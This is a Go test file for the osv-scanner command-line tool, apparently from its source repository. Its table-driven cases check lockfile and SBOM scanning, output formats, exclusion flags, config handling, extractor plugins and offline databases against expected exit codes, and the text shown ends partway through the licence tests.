( "net/http" "os" "path/filepath" "runtime" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestCommand(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ // one specific supported lockfile { Name: "one_specific_supported_lockfile", Args: []string{"", "source", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // one specific supported lockfile, explicitly not offline { Name: "one_specific_supported_lockfile_with_offline_explicitly_false", Args: []string{"", "source", "--offline=false", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // one specific supported sbom with vulns { Name: "folder_of_supported_sbom_with_vulns", Args: []string{"", "source", "./testdata/sbom-insecure/"}, Exit: 1, }, // one specific supported sbom with only unimportant { Name: "folder_of_supported_sbom_with_only_unimportant", Args: []string{"", "source", "./testdata/sbom-insecure/only-unimportant.spdx.json"}, Exit: 0, }, // one specific supported sbom with only unimportant but with --all-vulns { Name: "folder_of_supported_sbom_with_only_unimportant", Args: []string{"", "source", "--all-vulns", "./testdata/sbom-insecure/only-unimportant.spdx.json"}, Exit: 1, }, // one specific supported sbom with vulns { Name: "one_specific_supported_sbom_with_vulns", Args: []string{"", "source", "--sbom", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "one_specific_supported_sbom_with_vulns_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, // one specific supported sbom with vulns and invalid PURLs { Name: "one_specific_supported_sbom_with_invalid_PURLs", Args: []string{"", "source", "--sbom", "./testdata/sbom-insecure/bad-purls.cdx.xml"}, Exit: 0, }, { Name: "one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/bad-purls.cdx.xml"}, Exit: 0, }, // one specific supported sbom with duplicate PURLs { Name: "one_specific_supported_sbom_with_duplicate_PURLs", Args: []string{"", "source", "--sbom", "./testdata/sbom-insecure/with-duplicates.cdx.xml"}, Exit: 1, }, { Name: "one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag", Args: []string{"", "source", "-L", "./testdata/sbom-insecure/with-duplicates.cdx.xml"}, Exit: 1, }, // one file that does not match the supported sbom file names { Name: "one_file_that_does_not_match_the_supported_sbom_file_names", Args: []string{"", "source", "--sbom", "./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag", Args: []string{"", "source", "-L", "spdx:./testdata/locks-many/composer.lock"}, Exit: 127, }, // one specific unsupported lockfile { Name: "one_specific_unsupported_lockfile", Args: []string{"", "source", "./testdata/locks-many/not-a-lockfile.toml"}, Exit: 128, }, // all supported lockfiles in the directory should be checked { Name: "Scan_locks-many", Args: []string{"", "source", "./testdata/locks-many"}, Exit: 0, }, // all supported lockfiles in the directory should be checked { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", "source", "./testdata/locks-many-with-invalid"}, Exit: 127, }, // no lockfiles present in a directory { Name: "no_lockfiles_without_recursion_or_allow_flag_give_an_error", Args: []string{"", "source", "./testdata/locks-none"}, Exit: 128, }, { Name: "no_lockfiles_without_recursion_but_with_allow_flag_are_fine", Args: []string{"", "source", "--allow-no-lockfiles", "./testdata/locks-none"}, Exit: 0, }, { Name: "no_lockfiles_with_allow_flag_but_another_error_happens_is_not_fine", Args: []string{"", "source", "--allow-no-lockfiles", "./testdata/locks-none-does-not-exist"}, Exit: 127, }, { Name: "no_lockfiles_with_recursion_but_without_allow_flag_are_fine", Args: []string{"", "source", "--recursive", "./testdata/locks-none"}, Exit: 0, }, { Name: "no_lockfiles_with_recursion_and_with_allow_flag_are_fine", Args: []string{"", "source", "--recursive", "--allow-no-lockfiles", "./testdata/locks-none"}, Exit: 0, }, // only the files in the given directories are checked by default (no recursion) { Name: "only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion)", Args: []string{"", "source", "./testdata/locks-one-with-nested"}, Exit: 0, }, // nested directories are checked when `--recursive` is passed { Name: "nested_directories_are_checked_when_`--recursive`_is_passed", Args: []string{"", "source", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, // .gitignored files { Name: ".gitignored_files", Args: []string{"", "source", "--recursive", "./testdata/locks-gitignore"}, Exit: 0, }, // ignoring .gitignore { Name: "ignoring_.gitignore", Args: []string{"", "source", "--recursive", "--no-ignore", "./testdata/locks-gitignore"}, Exit: 0, }, // experimental exclude flag tests { Name: "exclude_with_exact_directory_name", Args: []string{"", "source", "--recursive", "--experimental-exclude=nested", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_glob_pattern", Args: []string{"", "source", "--recursive", "--experimental-exclude=g:**/nested/**", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_regex_pattern", Args: []string{"", "source", "--recursive", "--experimental-exclude=r:/nested$", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_invalid_regex_returns_error", Args: []string{"", "source", "--experimental-exclude=r:[invalid", "./testdata/locks-many"}, Exit: 127, }, { Name: "exclude_with_multiple_exact_directories", Args: []string{"", "source", "--recursive", "--experimental-exclude=nested", "--experimental-exclude=other", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "exclude_with_multiple_pattern_types", Args: []string{"", "source", "--recursive", "--experimental-exclude=nested", "--experimental-exclude=g:**/vendor/**", "--experimental-exclude=r:\\.cache$", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "json_output", Args: []string{"", "source", "--format", "json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // output format: sarif { Name: "Empty_sarif_output", Args: []string{"", "source", "--format", "sarif", "./testdata/locks-many/composer.lock"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 0, }, { Name: "Sarif_with_vulns", Args: []string{"", "source", "--format", "sarif", "./testdata/locks-many-with-insecure/package-lock.json"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 1, }, // output format: gh-annotations { Name: "Empty_gh-annotations_output", Args: []string{"", "source", "--format", "gh-annotations", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "gh-annotations_with_vulns", Args: []string{"", "source", "--format", "gh-annotations", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, // output format: markdown table { Name: "output_format:_markdown_table", Args: []string{"", "source", "--format", "markdown", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, // output format: cyclonedx 1.4 { Name: "Empty_cyclonedx_1.4_output", Args: []string{"", "source", "--format", "cyclonedx-1-4", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "cyclonedx_1.4_output", Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "cyclonedx-1-4", "--all-packages", "./testdata/locks-insecure"}, Exit: 1, }, // output format: cyclonedx 1.5 { Name: "Empty_cyclonedx_1.5_output", Args: []string{"", "source", "--format", "cyclonedx-1-5", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "cyclonedx_1.5_output", Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "cyclonedx-1-5", "--all-packages", "./testdata/locks-insecure"}, Exit: 1, }, // output format: spdx 2.3 { Name: "Empty_spdx_2.3_output", Args: []string{"", "source", "--format", "spdx-2-3", "./testdata/locks-many/composer.lock"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.NormalizeCreateDateSPDX, }, Exit: 0, }, { Name: "spdx_2.3_output", // SPDX does not support outputting vulnerabilties Args: []string{"", "source", "--config=./testdata/osv-scanner-empty-config.toml", "--format", "spdx-2-3", "--all-packages", "./testdata/locks-insecure"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.NormalizeCreateDateSPDX, }, Exit: 1, }, // output format: unsupported { Name: "output_format:_unsupported", Args: []string{"", "source", "--format", "unknown", "./testdata/locks-many/composer.lock"}, Exit: 127, }, // one specific supported lockfile with ignore { Name: "one_specific_supported_lockfile_with_ignore", Args: []string{"", "source", "./testdata/locks-test-ignore/package-lock.json"}, Exit: 0, }, { Name: "invalid_--verbosity_value", Args: []string{"", "source", "--verbosity", "unknown", "./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "verbosity_level_=_error", Args: []string{"", "source", "--verbosity", "error", "--format", "table", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "verbosity_level_=_info", Args: []string{"", "source", "--verbosity", "info", "--format", "table", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "PURL_SBOM_case_sensitivity_(api)", Args: []string{"", "source", "--format", "table", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "PURL_SBOM_case_sensitivity_(local)", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "table", "./testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, // Go project with an overridden go version and licenses { Name: "Go_project_with_an_overridden_go_version_and_licences", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "--licenses", "./testdata/go-project"}, Exit: 0, }, // Go project with an overridden go version { Name: "Go_project_with_an_overridden_go_version", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "./testdata/go-project"}, Exit: 0, }, // Go project with an overridden go version, recursive { Name: "Go_project_with_an_overridden_go_version,_recursive", Args: []string{"", "source", "--config=./testdata/go-project/go-version-config.toml", "-r", "./testdata/go-project"}, Exit: 0, }, // broad config file that overrides a whole ecosystem { Name: "config_file_can_be_broad", Args: []string{"", "source", "--config=./testdata/osv-scanner-composite-config.toml", "--licenses=MIT", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json", "./testdata/locks-many-with-insecure", "./testdata/locks-insecure", "./testdata/maven-transitive"}, Exit: 1, }, // ignored vulnerabilities and packages without a reason should be called out { Name: "ignores_without_reason_should_be_explicitly_called_out", Args: []string{"", "source", "--config=./testdata/osv-scanner-reasonless-ignores-config.toml", "./testdata/locks-many-with-insecure/package-lock.json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // invalid config file { Name: "config_file_is_invalid", Args: []string{"", "source", "./testdata/config-invalid"}, Exit: 130, }, // config file with unknown keys { Name: "config_files_cannot_have_unknown_keys", Args: []string{"", "source", "--config=./testdata/osv-scanner-unknown-config.toml", "./testdata/locks-many"}, Exit: 127, }, // config file with multiple ignores with the same id { Name: "config_files_should_not_have_multiple_ignores_with_the_same_id", Args: []string{"", "source", "--config=./testdata/osv-scanner-duplicate-config.toml", "./testdata/locks-many"}, Exit: 0, }, // a bunch of requirements.txt files with different names // --no-resolve is used as transitive resolution tests are in a separate section { Name: "requirements.txt_can_have_all_kinds_of_names", Args: []string{"", "source", "./testdata/locks-requirements", "--no-resolve"}, Exit: 1, }, { Name: "go_packages_in_osv-scanner.json_format", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner.json"}, Exit: 1, }, { Name: "help", Args: []string{"", "source", "--help"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Config_UnusedIgnores(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "unused_ignores_are_reported_with_specific_config_and_file", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure/alpine.cdx.xml"}, Exit: 1, }, { Name: "unused_ignores_are_reported_with_specific_config_and_multiple_files", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure/alpine.cdx.xml", "testdata/sbom-insecure/postgres-stretch.cdx.xml"}, Exit: 1, }, { Name: "unused_ignores_are_reported_with_specific_config_and_file", Args: []string{"", "source", "--config", "testdata/osv-scanner-partial-ignores-config.toml", "testdata/sbom-insecure"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_JavareachArchive(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "jars_can_be_scanned_without_call_analysis", Args: []string{"", "source", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, { Name: "jars_can_be_scanned_with_call_analysis", Args: []string{"", "source", "--call-analysis=jar", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, { Name: "jars_can_be_scanned_with_call_analysis_and_disabled_enricher", Args: []string{"", "source", "--call-analysis=jar", "--experimental-disable-plugins=reachability/java", "--all-vulns", "--experimental-plugins=artifact", "./testdata/artifact/javareach_test.jar"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_ExplicitExtractors_WithDefaults(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "empty_plugins_flag_does_nothing", Args: []string{"", "source", "--experimental-plugins="}, Exit: 127, }, { Name: "extractors_cancelled_out_specified_individually", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { Name: "extractors_cancelled_out_specified_together", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "source", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", }, Exit: 128, }, { // this will scan all the lockfiles as we have not explicitly disabled the // default extractors for any of the other lockfiles Name: "scanning_directory_with_one_specific_extractor_enabled_and_the_defaults", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many", }, Exit: 0, }, { Name: "scanning_directory_with_an_extractor_that_does_not_exist", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=custom/extractor", "--experimental-disable-plugins=custom/anotherextractor", "./testdata/locks-many", }, Exit: 127, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_individually", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=php/composerlock", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson,php/composerlock", "./testdata/locks-many", }, Exit: 0, }, { // this should result in all files within the directory being scanned // except for the package-lock.json Name: "scanning_directory_with_one_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package lock, since we're requested that file specifically Name: "scanning_file_with_one_specific_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many/package-lock.json", }, Exit: 0, }, { // this will result in no issues since we have left the default plugins enabled Name: "scanning_file_with_one_different_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "./testdata/locks-many/composer.lock", }, Exit: 0, }, { // this will result in an error about not being able to determine the extractor // since we've requested the file to be parsed with a specific extractor // that we've also disabled Name: "scanning_file_with_parse_as_but_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "-L", "package-lock.json:./testdata/locks-many/composer.lock", }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_ExplicitExtractors_WithoutDefaults(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "empty_plugins_flag_does_nothing", Args: []string{"", "source", "--experimental-no-default-plugins", "--experimental-plugins="}, Exit: 127, }, { Name: "extractors_cancelled_out_specified_individually", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx", "--experimental-plugins=sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { Name: "extractors_cancelled_out_specified_together", Args: []string{ "", "source", "--experimental-plugins=sbom/spdx,sbom/cdx", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { Name: "extractors_cancelled_out_with_presets", Args: []string{ "", "source", "--experimental-plugins=sbom", "--experimental-disable-plugins=sbom", "--experimental-no-default-plugins", }, Exit: 127, }, { // this will scan just the package-lock.json file as we've explicitly // disabled the default extractors for any of the other lockfiles Name: "scanning_directory_with_one_specific_extractor_enabled_and_no_defaults", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { Name: "scanning_directory_with_an_extractor_that_does_not_exist", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=custom/extractor", "--experimental-disable-plugins=custom/anotherextractor", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 127, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_individually", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-plugins=php/composerlock", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package-lock.json and composer.lock files as // we've not enabled extractors for any of the other lockfiles Name: "scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson,php/composerlock", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this should result in all files within the directory being scanned // except for the package-lock.json Name: "scanning_directory_with_one_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many", }, Exit: 0, }, { // this will scan just the package lock, since we're requested that file // specifically and have enabled just that extractor Name: "scanning_file_with_one_specific_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many/package-lock.json", }, Exit: 0, }, { // this will result in an error about not being able to find any package sources // since we've requested a composer.lock be scanned without the extractor enabled Name: "scanning_file_with_one_different_extractor_enabled", Args: []string{ "", "source", "--experimental-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "./testdata/locks-many/composer.lock", }, Exit: 128, }, { // this will result in an error about not being able to determine the extractor // since we've requested the file to be parsed with a specific extractor // that we've also disabled Name: "scanning_file_with_parse_as_but_specific_extractor_disabled", Args: []string{ "", "source", "--experimental-disable-plugins=javascript/packagelockjson", "--experimental-no-default-plugins", "-L", "package-lock.json:./testdata/locks-many/composer.lock", }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_CallAnalysis(t *testing.T) { t.Parallel() // This does require Go toolchain, but the whole project requires go toolchain, // so not an external dependency client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "Run_with_govulncheck", Args: []string{"", "source", "--call-analysis=go", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project"}, Exit: 1, }, { Name: "Run_with_govulncheck_all_uncalled", Args: []string{"", "source", "--call-analysis=go", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project-all-uncalled"}, Exit: 0, }, { Name: "Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag", Args: []string{"", "source", "--call-analysis=go", "--all-vulns", "--config=./testdata/osv-scanner-call-analysis-config.toml", "./testdata/call-analysis-go-project-all-uncalled"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LockfileWithExplicitParseAs(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "unsupported_parse-as", Args: []string{"", "source", "-L", "my-file:./testdata/locks-many/composer.lock"}, Exit: 127, }, { Name: "empty_is_default", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./testdata/locks-many/composer.lock"), }, Exit: 0, }, { Name: "empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./path/to/my:file"), }, Exit: 127, }, { Name: "empty_works_as_an_escape_(no_fixture_because_it's_not_valid_on_Windows)", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash("./path/to/my:project/package-lock.json"), }, Exit: 127, }, { Name: "one_lockfile_with_local_path", Args: []string{"", "source", "--lockfile=go.mod:./testdata/locks-many/replace-local.mod"}, Exit: 0, }, { Name: "when_an_explicit_parse-as_is_given,_it's_applied_to_that_file", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "multiple,_+_output_order_is_deterministic", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), "-L", "yarn.lock:" + filepath.FromSlash("./testdata/locks-insecure/my-yarn.lock"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "multiple,_+_output_order_is_deterministic_2", Args: []string{ "", "source", "-L", "yarn.lock:" + filepath.FromSlash("./testdata/locks-insecure/my-yarn.lock"), "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), }, Exit: 1, }, { Name: "files_that_error_on_parsing_stop_parsable_files_from_being_checked", Args: []string{ "", "source", "-L", "Cargo.lock:" + filepath.FromSlash("./testdata/locks-insecure/my-package-lock.json"), filepath.FromSlash("./testdata/locks-insecure"), filepath.FromSlash("./testdata/locks-many"), }, Exit: 127, }, { Name: "parse-as_takes_priority,_even_if_it's_wrong", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash("./testdata/locks-many/yarn.lock"), }, Exit: 127, }, { Name: "\"apk-installed\" is supported", Args: []string{ "", "source", "-L", "apk-installed:" + filepath.FromSlash("./testdata/locks-many/installed"), }, Exit: 0, // don't intercept requests for this case as the apk extractor reads the OS version // of the environment its being run in, and currently does not support being overridden HTTPClient: http.DefaultClient, }, { Name: "\"dpkg-status\" is supported", Args: []string{ "", "source", "-L", "dpkg-status:" + filepath.FromSlash("./testdata/locks-many/status"), }, Exit: 0, // don't intercept requests for this case as the dpkg extractor reads the OS version // of the environment its being run in, and currently does not support being overridden HTTPClient: http.DefaultClient, }, { // if this isn't true, the test would fail along the lines of // "could not determine extractor, requested D" Name: "absolute_paths_are_automatically_escaped_on_windows", Args: []string{ "", "source", "-L", filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 0, }, { Name: "absolute_paths_work_with_explicit_escaping", Args: []string{ "", "source", "-L", ":" + filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 0, }, { Name: "absolute_paths_can_have_explicit_parse_as", Args: []string{ "", "source", "-L", "package-lock.json:" + filepath.FromSlash(filepath.Join(cwd, "./testdata/locks-many/yarn.lock")), }, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() if tt.HTTPClient == nil { tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) } testcmd.RunAndMatchSnapshots(t, tt) }) } } // TestCommand_GithubActions tests common actions the github actions reusable workflow will run func TestCommand_GithubActions(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "scanning_osv-scanner_custom_format", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json"}, Exit: 1, }, { Name: "scanning_osv-scanner_custom_format_with_git_tag", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-custom-git-tag.json"}, Exit: 1, }, { Name: "scanning_osv-scanner_custom_format_output_json", Args: []string{"", "source", "-L", "osv-scanner:./testdata/locks-insecure/osv-scanner-flutter-deps.json", "--format=sarif"}, ReplaceRules: []testutility.JSONReplaceRule{ testutility.ReplacePartialFingerprintHash, }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LocalDatabases(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "one_specific_supported_lockfile", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "one_specific_supported_sbom_with_vulns", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/sbom-insecure/postgres-stretch.cdx.xml"}, Exit: 1, }, { Name: "one_specific_unsupported_lockfile", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many/not-a-lockfile.toml"}, Exit: 128, }, { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many-with-insecure"}, Exit: 1, }, { Name: "all_supported_lockfiles_in_the_directory_should_be_checked", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-many-with-invalid"}, Exit: 127, }, { Name: "only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion)", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: "nested_directories_are_checked_when_`--recursive`_is_passed", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, { Name: ".gitignored_files", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "./testdata/locks-gitignore"}, Exit: 0, }, { Name: "ignoring_.gitignore", Args: []string{"", "source", "--offline", "--download-offline-databases", "--recursive", "--no-ignore", "./testdata/locks-gitignore"}, Exit: 0, }, { Name: "output_with_json", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "json", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "output_format:_markdown_table", Args: []string{"", "source", "--offline", "--download-offline-databases", "--format", "markdown", "./testdata/locks-many/composer.lock"}, Exit: 0, }, { Name: "database_should_be_downloaded_only_when_offline_is_set", Args: []string{"", "source", "--download-offline-databases", "./testdata/locks-many"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) old := tt.Args tt.Args = []string{"", "source", "--local-db-path", testDir} tt.Args = append(tt.Args, old[2:]...) tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) // run each test twice since they should provide the same output, // and the second run should be fast as the db is already available testcmd.RunAndMatchSnapshots(t, tt) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_LocalDatabases_AlwaysOffline(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "a_bunch_of_different_lockfiles_and_ecosystem", Args: []string{"", "source", "--offline", "./testdata/locks-requirements", "./testdata/locks-many-with-insecure"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) old := tt.Args tt.Args = []string{"", "source", "--local-db-path", testDir} tt.Args = append(tt.Args, old[2:]...) tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) // run each test twice since they should provide the same output, // and the second run should be fast as the db is already available testcmd.RunAndMatchSnapshots(t, tt) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_CommitSupport(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "online_uses_git_commits", Args: []string{"", "source", "--lockfile", "osv-scanner:./testdata/locks-git/osv-scanner.json"}, Exit: 1, }, { Name: "offline_uses_git_tags", Args: []string{"", "source", "--offline", "--download-offline-databases", "--lockfile", "osv-scanner:./testdata/locks-git/osv-scanner.json"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Licenses(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "No_vulnerabilities_with_license_summary", Args: []string{"", "source", "--licenses", "./testdata/locks-many"}, Exit: 0, }, { Name: "No_vulnerabilities_with_license_summary_in_markdown", Args: []string{"", "source", "--licenses", "--format=markdown", "./testdata/locks-many"}, Exit: 0, }, { Name: "Vulnerabilities_and_license_summary", Args: []string{"", "source", "--licenses", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "Vulnerabilities_and_license_violations_with_allowlist", Args: []string{"", "source", 